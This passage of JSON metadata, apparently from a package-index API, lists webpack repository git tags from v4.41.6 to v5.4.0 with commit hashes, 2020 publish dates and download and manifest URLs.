.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/